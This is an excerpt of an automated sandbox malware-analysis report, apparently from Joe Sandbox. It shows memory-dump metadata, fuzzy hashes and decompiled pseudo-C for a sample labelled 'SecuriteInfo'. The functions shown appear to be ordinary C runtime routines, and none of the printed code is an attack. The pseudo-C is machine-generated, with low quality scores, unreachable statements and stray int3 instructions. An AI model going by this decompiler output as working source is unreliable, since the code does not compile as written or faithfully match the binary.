    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: BitmapCaretCreateDeleteDestroyFocusObject
    • String ID: d
    • API String ID: 3626877506-2564639436
    • Opcode ID: 676835c6d5bffd31341896983623744715a730bd9a71789a5d5bd587276df3ef
    • Instruction ID: 75e942415648241cb8898a700b90cba71395d9153cd56eddc11670d1d04df35f
    • Opcode Fuzzy Hash: 676835c6d5bffd31341896983623744715a730bd9a71789a5d5bd587276df3ef
    • Instruction Fuzzy Hash: BA71C379A04209DFCB04CF58C098AADBBF1FF49315F1584A9E899DB362D735E980CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: System
    • String ID: `
    • API String ID: 3470857405-2679148245
    • Opcode ID: 038aeb8c62d81b81b4747bbeb350f82876859aa107e09abae31763a37754a7e1
    • Instruction ID: 3b041e53eee740a24e33f7be34b0487e9ab919d138ee91395157337d73b6ce4a
    • Opcode Fuzzy Hash: 038aeb8c62d81b81b4747bbeb350f82876859aa107e09abae31763a37754a7e1
    • Instruction Fuzzy Hash: 77411FB8504208AFD740EF58D598B9ABBE0FB48314F01C55AEC698F362D7B9D948DF41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E001B001C(intOrPtr _a4) {
    				char _v16;
    				signed int _v20;
    				signed int _t11;
    				int _t14;
    				void* _t16;
    				void* _t20;
    				int _t22;
    				signed int _t23;
    
    				_t11 =  *0x1c4050; // 0x33da424a
    				 *[fs:0x0] =  &_v16;
    				_v20 = _v20 & 0x00000000;
    				_t14 =  &_v20;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x1baf36, 0xffffffff);
    				if(_t14 != 0) {
    					_t14 = GetProcAddress(_v20, "CorExitProcess");
    					_t22 = _t14;
    					if(_t22 != 0) {
    						 *0x1c7000(_a4);
    						_t14 =  *_t22();
    					}
    				}
    				if(_v20 != 0) {
    					_t14 = FreeLibrary(_v20);
    				}
    				 *[fs:0x0] = _v16;
    				return _t14;
    			}











    0x001b0031
    0x001b003c
    0x001b0042
    0x001b0046
    0x001b0051
    0x001b0059
    0x001b0063
    0x001b0069
    0x001b006d
    0x001b0074
    0x001b007a
    0x001b007a
    0x001b006d
    0x001b0080
    0x001b0085
    0x001b0085
    0x001b008e
    0x001b0098

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,33DA424A,?,?,00000000,001BAF36,000000FF,?,001B00E6,001AFF81,?,001B0182,00000000), ref: 001B0051
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B0063
    • FreeLibrary.KERNEL32(00000000,?,?,00000000,001BAF36,000000FF,?,001B00E6,001AFF81,?,001B0182,00000000), ref: 001B0085
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 9318d00925e7b5c4ecf63a1c28aff23f3445c6c8c02d563548292a29d7f11476
    • Instruction ID: 1c8fd8126fbde073ede8820a0ea0e53ad5a77b3390115e13c76de670151123d9
    • Opcode Fuzzy Hash: 9318d00925e7b5c4ecf63a1c28aff23f3445c6c8c02d563548292a29d7f11476
    • Instruction Fuzzy Hash: A501A271944615EFCB229F90DC09FFFBBB8FB09B51F000629F812A2690DB74D940CA90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: EnableItemMenu$AvailableClipboardFormat
    • String ID:
    • API String ID: 4217543366-0
    • Opcode ID: 3b3fecc69610f8dedf61906ac4046866609f2fc481a45573c3378340e61c1f65
    • Instruction ID: a245066ccd70a50680daaf652023644215d4816029c1a43f5dab89d1520f04f2
    • Opcode Fuzzy Hash: 3b3fecc69610f8dedf61906ac4046866609f2fc481a45573c3378340e61c1f65
    • Instruction Fuzzy Hash: 96119874604204AFD744EF68D599B9EBFE0EB84701F00C42DEC89CB355EB74D8949B56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E001B7EA7(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v28;
    				signed int _v36;
    				void* _v40;
    				intOrPtr _v44;
    				signed int _v48;
    				intOrPtr _v56;
    				void _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v80;
    				void* __ebx;
    				void* __ebp;
    				void* _t57;
    				void* _t58;
    				char _t59;
    				intOrPtr* _t64;
    				void* _t65;
    				intOrPtr* _t70;
    				void* _t73;
    				signed char* _t76;
    				intOrPtr* _t79;
    				void* _t81;
    				signed int _t85;
    				signed int _t86;
    				signed char _t91;
    				signed int _t94;
    				void* _t102;
    				void* _t107;
    				void* _t113;
    				void* _t115;
    
    				_t102 = __esi;
    				_t93 = __edx;
    				_t81 = __ecx;
    				_t79 = _a4;
    				if( *_t79 == 0x80000003) {
    					return _t57;
    				} else {
    					_push(__esi);
    					_push(__edi);
    					_t58 = E001B1C6E(_t79, __ecx, __edx, __edi, __esi);
    					if( *((intOrPtr*)(_t58 + 8)) != 0) {
    						__imp__EncodePointer(0);
    						_t102 = _t58;
    						if( *((intOrPtr*)(E001B1C6E(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
    							_t70 = E001B430E(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
    							_t113 = _t113 + 0x1c;
    							if(_t70 != 0) {
    								L16:
    								return _t70;
    							}
    						}
    					}
    					_t59 = _a20;
    					_v24 = _t59;
    					_v20 = 0;
    					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
    						E001B41BE(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
    						_t94 = _v36;
    						_t115 = _t113 + 0x18;
    						_t70 = _v40;
    						_v16 = _t70;
    						_v8 = _t94;
    						if(_t94 < _v28) {
    							_t85 = _t94 * 0x14;
    							_v12 = _t85;
    							do {
    								_t86 = 5;
    								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
    								_t115 = _t115 + 0xc;
    								if(_v60 <= _t73 && _t73 <= _v56) {
    									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
    									_t91 = _t76[4];
    									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
    										if(( *_t76 & 0x00000040) == 0) {
    											_push(0);
    											_push(1);
    											E001B7E27(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
    											_t94 = _v8;
    											_t115 = _t115 + 0x30;
    										}
    									}
    								}
    								_t94 = _t94 + 1;
    								_t70 = _v16;
    								_t85 = _v12 + 0x14;
    								_v8 = _t94;
    								_v12 = _t85;
    							} while (_t94 < _v28);
    						}
    						goto L16;
    					}
    					E001B1BDC(_t79, _t81, _t93, 0, _t102);
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					_v80 = _v64 + 0xc;
    					_t64 = E001B6200(_v68, _v60);
    					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
    					_pop(_t110);
    					_t83 = _v60;
    					if(_v60 == 0x100) {
    						_t83 = 2;
    					}
    					return E001B6200(_t65, _t83);
    				}
    			}






































    0x001b7ea7
    0x001b7ea7
    0x001b7ea7
    0x001b7eae
    0x001b7eb7
    0x001b7fd6
    0x001b7ebd
    0x001b7ebd
    0x001b7ebe
    0x001b7ebf
    0x001b7ec9
    0x001b7ecc
    0x001b7ed2
    0x001b7edc
    0x001b7f01
    0x001b7f06
    0x001b7f0b
    0x001b7fd2
    0x00000000
    0x001b7fd3
    0x001b7f0b
    0x001b7edc
    0x001b7f11
    0x001b7f14
    0x001b7f17
    0x001b7f1d
    0x001b7f35
    0x001b7f3a
    0x001b7f3d
    0x001b7f40
    0x001b7f43
    0x001b7f46
    0x001b7f4c
    0x001b7f52
    0x001b7f55
    0x001b7f58
    0x001b7f67
    0x001b7f68
    0x001b7f68
    0x001b7f6d
    0x001b7f80
    0x001b7f82
    0x001b7f87
    0x001b7f92
    0x001b7f94
    0x001b7f96
    0x001b7fb2
    0x001b7fb7
    0x001b7fba
    0x001b7fba
    0x001b7f92
    0x001b7f87
    0x001b7fc0
    0x001b7fc1
    0x001b7fc4
    0x001b7fc7
    0x001b7fca
    0x001b7fcd
    0x001b7f58
    0x00000000
    0x001b7f4c
    0x001b7fd7
    0x001b7fdc
    0x001b7fdd
    0x001b7fde
    0x001b7fdf
    0x001b7fee
    0x001b7ffe
    0x001b8005
    0x001b800b
    0x001b800c
    0x001b8018
    0x001b801a
    0x001b801a
    0x001b8029
    0x001b8029

    APIs
    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,001B7DAD,?,?,00000000,00000000,00000000,?), ref: 001B7ECC
    • CatchIt.LIBVCRUNTIME ref: 001B7FB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    • Opcode ID: 6ab6e5ded9f36eb299294852a5e6643842a81ae93df6aee26297fd678ab072b1
    • Instruction ID: aac7317526c3d8fcae547adf5ce74dca8a431a1dabb511d4619b204dba5a4d42
    • Opcode Fuzzy Hash: 6ab6e5ded9f36eb299294852a5e6643842a81ae93df6aee26297fd678ab072b1
    • Instruction Fuzzy Hash: A0414871904209AFCF15DF98CC81AFEBBB5FF88304F158099FA24A72A1D335A950DB65
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: MessagePostTimer
    • String ID: 2$2
    • API String ID: 2370412193-3784399050
    • Opcode ID: 6fa63af0bdb46e89eb67625d93faf9ebe5efc556def27748f3b60e6a6c4443d2
    • Instruction ID: 99fedfeb5d742f0493cddb39186518120f55a1b05a990e2189b740646e7da13b
    • Opcode Fuzzy Hash: 6fa63af0bdb46e89eb67625d93faf9ebe5efc556def27748f3b60e6a6c4443d2
    • Instruction Fuzzy Hash: BF1193B4108204EFD744EF58C148BA97BE0BB05354F85C4A9F89D8B2A2D7B5DA88DF52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001B6086(WCHAR* _a4) {
    				struct HINSTANCE__* _t4;
    
    				_t4 = LoadLibraryExW(_a4, 0, 0x800);
    				if(_t4 != 0) {
    					return _t4;
    				} else {
    					if(GetLastError() != 0x57 || E001B4A59(_a4, L"api-ms-", 7) == 0) {
    						return 0;
    					}
    					return LoadLibraryExW(_a4, 0, 0);
    				}
    			}




    0x001b6093
    0x001b609b
    0x001b60d0
    0x001b609d
    0x001b60a6
    0x00000000
    0x001b60cd
    0x001b60cc
    0x001b60cc

    APIs
    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,001B6122,?,?,00000000,?,?,?,001B5F6A,00000000,FlsAlloc,001BD668,001BD670), ref: 001B6093
    • GetLastError.KERNEL32(?,001B6122,?,?,00000000,?,?,?,001B5F6A,00000000,FlsAlloc,001BD668,001BD670,?,?,001B1C2A), ref: 001B609D
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,001B1C2A,001B1D0E,00000003,001B148B,?,?,?,?,00000000,00000000,00000000), ref: 001B60C5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 9542909fecd8daa0383a1a262f7ae3af3dee56b5a7c48812cc8f9b48020d92c6
    • Instruction ID: e2d25c63f532c46914f6e83e914b63616c909a0454b4d1a69b71694d203508e2
    • Opcode Fuzzy Hash: 9542909fecd8daa0383a1a262f7ae3af3dee56b5a7c48812cc8f9b48020d92c6
    • Instruction Fuzzy Hash: 8EE0B8306C0305B7DB202FA2EC0AFA93F65BB21B51F104025F90EA98E6D765D9549595
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E001B69C1(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
    				char _v16;
    				signed int _v20;
    				char _v28;
    				char _v35;
    				signed char _v36;
    				void _v44;
    				long _v48;
    				signed char* _v52;
    				char _v53;
    				long _v60;
    				intOrPtr _v64;
    				struct _OVERLAPPED* _v68;
    				signed int _v72;
    				struct _OVERLAPPED* _v76;
    				signed int _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				void _v92;
    				long _v96;
    				signed char* _v100;
    				void* _v104;
    				intOrPtr _v108;
    				char _v112;
    				int _v116;
    				struct _OVERLAPPED* _v120;
    				struct _OVERLAPPED* _v124;
    				struct _OVERLAPPED* _v128;
    				struct _OVERLAPPED* _v132;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t177;
    				signed int _t178;
    				signed int _t180;
    				int _t186;
    				signed char* _t190;
    				signed char _t195;
    				intOrPtr _t198;
    				void* _t200;
    				signed char* _t201;
    				long _t205;
    				intOrPtr _t210;
    				void _t212;
    				signed char* _t217;
    				void* _t224;
    				char _t227;
    				struct _OVERLAPPED* _t229;
    				void* _t238;
    				signed int _t240;
    				signed char* _t243;
    				long _t246;
    				intOrPtr _t247;
    				signed char* _t248;
    				void* _t258;
    				intOrPtr _t265;
    				void* _t266;
    				struct _OVERLAPPED* _t267;
    				signed int _t268;
    				signed int _t273;
    				intOrPtr* _t279;
    				signed int _t281;
    				signed int _t285;
    				signed char _t286;
    				long _t287;
    				signed int _t291;
    				signed char* _t292;
    				struct _OVERLAPPED* _t296;
    				void* _t299;
    				signed int _t300;
    				signed int _t302;
    				struct _OVERLAPPED* _t303;
    				signed char* _t306;
    				intOrPtr* _t307;
    				void* _t308;
    				signed int _t309;
    				long _t310;
    				signed int _t311;
    				signed int _t312;
    				signed int _t313;
    				void* _t314;
    				void* _t315;
    				void* _t316;
    
    				_push(0xffffffff);
    				_push(0x1baf8d);
    				_push( *[fs:0x0]);
    				_t315 = _t314 - 0x74;
    				_t177 =  *0x1c4050; // 0x33da424a
    				_t178 = _t177 ^ _t313;
    				_v20 = _t178;
    				_push(_t178);
    				 *[fs:0x0] =  &_v16;
    				_t180 = _a8;
    				_t306 = _a12;
    				_t265 = _a20;
    				_t268 = (_t180 & 0x0000003f) * 0x38;
    				_t291 = _t180 >> 6;
    				_v100 = _t306;
    				_v64 = _t265;
    				_v84 = _t291;
    				_v72 = _t268;
    				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x1c62e0 + _t291 * 4)) + _t268 + 0x18));
    				_v88 = _a16 + _t306;
    				_t186 = GetConsoleOutputCP();
    				_t317 =  *((char*)(_t265 + 0x14));
    				_v116 = _t186;
    				if( *((char*)(_t265 + 0x14)) == 0) {
    					E001B1490(_t265, _t317);
    				}
    				_t307 = _a4;
    				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t190 = _v100;
    				_t292 = _t190;
    				_v52 = _t292;
    				if(_t190 < _v88) {
    					_t300 = _v72;
    					_t267 = 0;
    					_v76 = 0;
    					do {
    						_v53 =  *_t292;
    						_v68 = _t267;
    						_v48 = 1;
    						_t273 =  *(0x1c62e0 + _v84 * 4);
    						_v80 = _t273;
    						if(_v108 != 0xfde9) {
    							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
    							__eflags = _t195 & 0x00000004;
    							if((_t195 & 0x00000004) == 0) {
    								_t273 =  *_t292 & 0x000000ff;
    								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
    								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
    								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
    									_push(_v64);
    									_push(1);
    									_push(_t292);
    									goto L29;
    								} else {
    									_t217 =  &(_t292[1]);
    									_v60 = _t217;
    									__eflags = _t217 - _v88;
    									if(_t217 >= _v88) {
    										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
    										 *( *(0x1c62e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x1c62e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
    										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
    									} else {
    										_t224 = E001B8745(_t273,  &_v68, _t292, 2, _v64);
    										_t316 = _t315 + 0x10;
    										__eflags = _t224 - 0xffffffff;
    										if(_t224 != 0xffffffff) {
    											_t201 = _v60;
    											goto L31;
    										}
    									}
    								}
    							} else {
    								_push(_v64);
    								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
    								_t227 =  *_t292;
    								_v35 = _t227;
    								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
    								_push(2);
    								_push( &_v36);
    								L29:
    								_push( &_v68);
    								_t200 = E001B8745(_t273);
    								_t316 = _t315 + 0x10;
    								__eflags = _t200 - 0xffffffff;
    								if(_t200 != 0xffffffff) {
    									_t201 = _v52;
    									goto L31;
    								}
    							}
    						} else {
    							_t229 = _t267;
    							_t279 = _t273 + 0x2e + _t300;
    							while( *_t279 != _t267) {
    								_t229 =  &(_t229->Internal);
    								_t279 = _t279 + 1;
    								if(_t229 < 5) {
    									continue;
    								}
    								break;
    							}
    							_t302 = _v88 - _t292;
    							_v48 = _t229;
    							if(_t229 == 0) {
    								_t73 = ( *_t292 & 0x000000ff) + 0x1c47b0; // 0x0
    								_t281 =  *_t73 + 1;
    								_v80 = _t281;
    								__eflags = _t281 - _t302;
    								if(_t281 > _t302) {
    									__eflags = _t302;
    									if(_t302 <= 0) {
    										goto L44;
    									} else {
    										_t309 = _v72;
    										do {
    											 *((char*)( *(0x1c62e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
    											_t267 =  &(_t267->Internal);
    											__eflags = _t267 - _t302;
    										} while (_t267 < _t302);
    										goto L43;
    									}
    									L52:
    								} else {
    									_v132 = _t267;
    									__eflags = _t281 - 4;
    									_v128 = _t267;
    									_v60 = _t292;
    									_v48 = (_t281 == 4) + 1;
    									_t238 = E001B8980( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
    									_t316 = _t315 + 0x14;
    									__eflags = _t238 - 0xffffffff;
    									if(_t238 != 0xffffffff) {
    										_t240 =  &(_v52[_v80]);
    										__eflags = _t240;
    										_t300 = _v72;
    										goto L21;
    									}
    								}
    							} else {
    								_t285 = _v72;
    								_t243 = _v80 + 0x2e + _t285;
    								_v80 = _t243;
    								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x1c47b0)) + 1;
    								_v60 = _t246;
    								_t247 = _t246 - _v48;
    								_v76 = _t247;
    								if(_t247 > _t302) {
    									__eflags = _t302;
    									if(_t302 > 0) {
    										_t248 = _v52;
    										_t310 = _v48;
    										do {
    											_t286 =  *((intOrPtr*)(_t267 + _t248));
    											_t292 =  *(0x1c62e0 + _v84 * 4) + _t285 + _t267;
    											_t267 =  &(_t267->Internal);
    											_t292[_t310 + 0x2e] = _t286;
    											_t285 = _v72;
    											__eflags = _t267 - _t302;
    										} while (_t267 < _t302);
    										L43:
    										_t307 = _a4;
    									}
    									L44:
    									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
    								} else {
    									_t287 = _v48;
    									_t303 = _t267;
    									_t311 = _v80;
    									do {
    										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
    										_t303 =  &(_t303->Internal);
    										_t311 = _t311 + 1;
    									} while (_t303 < _t287);
    									_t304 = _v76;
    									if(_v76 > 0) {
    										E001AF6B0( &_v28 + _t287, _t292, _t304);
    										_t287 = _v48;
    										_t315 = _t315 + 0xc;
    									}
    									_t300 = _v72;
    									_t296 = _t267;
    									_t312 = _v84;
    									do {
    										 *( *((intOrPtr*)(0x1c62e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
    										_t296 =  &(_t296->Internal);
    									} while (_t296 < _t287);
    									_t307 = _a4;
    									_v112 =  &_v28;
    									_v124 = _t267;
    									_v120 = _t267;
    									_v48 = (_v60 == 4) + 1;
    									_t258 = E001B8980( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
    									_t316 = _t315 + 0x14;
    									if(_t258 != 0xffffffff) {
    										_t240 =  &(_v52[_v76]);
    										L21:
    										_t201 = _t240 - 1;
    										L31:
    										_v52 = _t201 + 1;
    										_t205 = E001B5A29(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
    										_t315 = _t316 + 0x20;
    										_v60 = _t205;
    										if(_t205 != 0) {
    											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
    												L50:
    												 *_t307 = GetLastError();
    											} else {
    												_t292 = _v52;
    												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
    												_v76 = _t210;
    												 *((intOrPtr*)(_t307 + 4)) = _t210;
    												if(_v96 >= _v60) {
    													if(_v53 != 0xa) {
    														goto L38;
    													} else {
    														_t212 = 0xd;
    														_v92 = _t212;
    														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
    															goto L50;
    														} else {
    															if(_v96 >= 1) {
    																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
    																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
    																_t292 = _v52;
    																_v76 =  *((intOrPtr*)(_t307 + 4));
    																goto L38;
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L51;
    						L38:
    					} while (_t292 < _v88);
    				}
    				L51:
    				 *[fs:0x0] = _v16;
    				_pop(_t299);
    				_pop(_t308);
    				_pop(_t266);
    				return E001ADB25(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
    				goto L52;
    			}





















































































    0x001b69c6
    0x001b69c8
    0x001b69d3
    0x001b69d4
    0x001b69d7
    0x001b69dc
    0x001b69de
    0x001b69e4
    0x001b69e8
    0x001b69ee
    0x001b69f3
    0x001b69f9
    0x001b69fc
    0x001b69ff
    0x001b6a02
    0x001b6a05
    0x001b6a08
    0x001b6a12
    0x001b6a19
    0x001b6a21
    0x001b6a24
    0x001b6a2a
    0x001b6a2e
    0x001b6a31
    0x001b6a35
    0x001b6a35
    0x001b6a3d
    0x001b6a45
    0x001b6a4a
    0x001b6a4b
    0x001b6a4c
    0x001b6a4d
    0x001b6a50
    0x001b6a52
    0x001b6a58
    0x001b6a5e
    0x001b6a61
    0x001b6a63
    0x001b6a66
    0x001b6a6f
    0x001b6a75
    0x001b6a78
    0x001b6a7f
    0x001b6a86
    0x001b6a89
    0x001b6bc3
    0x001b6bc7
    0x001b6bca
    0x001b6bed
    0x001b6bf3
    0x001b6bf5
    0x001b6bf9
    0x001b6c2a
    0x001b6c2d
    0x001b6c2f
    0x00000000
    0x001b6bfb
    0x001b6bfb
    0x001b6bfe
    0x001b6c01
    0x001b6c04
    0x001b6d4e
    0x001b6d5c
    0x001b6d65
    0x001b6c0a
    0x001b6c14
    0x001b6c19
    0x001b6c1c
    0x001b6c1f
    0x001b6c25
    0x00000000
    0x001b6c25
    0x001b6c1f
    0x001b6c04
    0x001b6bcc
    0x001b6bd3
    0x001b6bd6
    0x001b6bd9
    0x001b6bdb
    0x001b6bde
    0x001b6be5
    0x001b6be7
    0x001b6c30
    0x001b6c33
    0x001b6c34
    0x001b6c39
    0x001b6c3c
    0x001b6c3f
    0x001b6c45
    0x00000000
    0x001b6c45
    0x001b6c3f
    0x001b6a8f
    0x001b6a92
    0x001b6a94
    0x001b6a96
    0x001b6a9a
    0x001b6a9b
    0x001b6a9f
    0x00000000
    0x00000000
    0x00000000
    0x001b6a9f
    0x001b6aa4
    0x001b6aa6
    0x001b6aab
    0x001b6b6b
    0x001b6b72
    0x001b6b73
    0x001b6b76
    0x001b6b78
    0x001b6d28
    0x001b6d2a
    0x00000000
    0x001b6d2c
    0x001b6d2c
    0x001b6d2f
    0x001b6d3e
    0x001b6d42
    0x001b6d43
    0x001b6d43
    0x00000000
    0x001b6d47
    0x00000000
    0x001b6b7e
    0x001b6b83
    0x001b6b86
    0x001b6b89
    0x001b6b8f
    0x001b6b98
    0x001b6ba3
    0x001b6ba8
    0x001b6bab
    0x001b6bae
    0x001b6bb7
    0x001b6bb7
    0x001b6bba
    0x00000000
    0x001b6bba
    0x001b6bae
    0x001b6ab1
    0x001b6ab4
    0x001b6aba
    0x001b6abc
    0x001b6ac9
    0x001b6aca
    0x001b6acd
    0x001b6ad0
    0x001b6ad5
    0x001b6cf9
    0x001b6cfb
    0x001b6cfd
    0x001b6d00
    0x001b6d03
    0x001b6d0f
    0x001b6d12
    0x001b6d14
    0x001b6d15
    0x001b6d19
    0x001b6d1c
    0x001b6d1c
    0x001b6d20
    0x001b6d20
    0x001b6d20
    0x001b6d23
    0x001b6d23
    0x001b6adb
    0x001b6adb
    0x001b6ade
    0x001b6ae0
    0x001b6ae3
    0x001b6ae5
    0x001b6ae9
    0x001b6aea
    0x001b6aeb
    0x001b6aef
    0x001b6af4
    0x001b6afe
    0x001b6b03
    0x001b6b06
    0x001b6b06
    0x001b6b09
    0x001b6b0c
